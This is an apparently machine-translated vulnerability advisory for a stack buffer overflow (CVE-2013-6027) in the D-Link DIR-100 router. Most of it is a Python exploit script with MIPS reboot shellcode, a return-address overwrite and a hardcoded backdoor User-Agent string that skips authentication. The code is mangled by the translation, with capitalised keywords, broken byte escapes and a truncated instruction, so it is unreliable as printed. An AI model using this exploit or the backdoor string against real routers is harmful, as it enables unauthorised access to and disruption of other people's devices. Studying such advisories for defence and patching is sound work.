D-Link DIR-100 'runtimediagnosticping () 'Stack Buffer Overflow Vulnerability

Release date:
Updated on:

Affected Systems:
D-Link DIR-100
Description:
--------------------------------------------------------------------------------
Bugtraq id: 63234
CVE (CAN) ID: CVE-2013-6027

D-Link DIR-100 is a small Broadband Router integrated with firewall functionality.

A buffer overflow vulnerability exists in the RuntimeDiagnosticPing function in the/bin/webs on the D-Link DIR-100 router, authenticated remote administrators can exploit this vulnerability to execute arbitrary commands by sending long set/runtime/diagnostic/pingIp parameters to Tools/tools_misc.xgi.

<* Source: Craig Heffner
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

Import sys
Import urllib2

Try:
Url = 'HTTP: // % s/Tools/tools_misc.xgi? Domain = a & set/runtime/diagnostic/pingIp = '% sys. argv [1]
Except t Exception, e:
Print str (e)
Print 'usage: % s <target ip> '% sys. argv [0]
Sys. exit (1)

# This is the actual payload; here it is a simple reboot shellcode.
# This payload size is limited to about 200 bytes, otherwise you'll crash elsewhere in/bin/webs.
Payload = "\ x3c \ x06 \ x43 \ x21" # lui a2, 0x4321
Payload + = "\ x34 \ xc6 \ xfe \ xdc" # ori a2, a2, 0 xfedc
Payload + = "\ x3c \ x05 \ x28 \ x12" # lui a1, 0x2812
Payload + = "\ x34 \ xa5 \ x19 \ x69" # ori a1, a1, 0x1969
Payload + = "\ x3c \ x04 \ xfe \ xe1" # lui a0, 0xfee1
Payload + = "\ x34 \ x84 \ xde \ xad" # ori a0, a0, 0 xdead
Payload + = "\ x24 \ x02 \ x0f \ xf8" # li v0, 4088
Payload + = "\ x01 \ x01 \ x01 \ x0c" # syscall 0x40404

# The payload is split up; some of it before the return address on the stack, some after.
# This little snippet skips over the return address during execution.
# It assumes that your shellcode will not be using the $ fp or $ t9 registers.
Move_sp_fp = "\ x03 \ xa0 \ xf0 \ x21" # move $ fp, $ sp
Jump_code = "\ x27 \ xd9 \ x02 \ xd4" # addiu $ t9, $ fp, 724
Jump_code + = "\ x03 \ x21 \ xf8 \ x08" # jr $ t9
Jump_code + = "\ x27 \ xE0 \ xFE" # addiu $ zero, $ ra,-0x102

# Stitch together the payload chunk (s) and jump_code snippet
Shellcode_p1 = move_sp_fp + payload [0: 68] + jump_code + "DD"
If len (shellcode_p1) <86:
Shellcode_p1 + = "D" * (86-len (shellcode_p1 ))
Shellcode_p2 = ""
Else:
Shellcode_p2 = "DD" + payload [68:]

# Build the overflow buffer, with the return address and shellcode
# Libc. so base address and ROP gadget offset for the DIR-100, revA, v1.13
# Libc_base = 0x2aaee000
# Ret_offset = 0x3243C
Buf = shellcode_p1 + "\ x2A \ xB2 \ x04 \ x3C" + shellcode_p2

# Normally only admins can access the tools_misc.xgi page; use the backdoor user-agent to bypass authentication
Req = urllib2.Request (url + buf, headers = {'user-agent': 'xmlset _ roodkcableoj28840ybtide '})
Urllib2.urlopen (req)

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

D-Link
------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://www.dlink.com/

Related reading:

D-Link router firmware backdoor Vulnerability

Reverse Engineering youxun Technology (D-Link) router firmware Backdoor

How do I decompile the D-Link router firmware program and find its backdoor?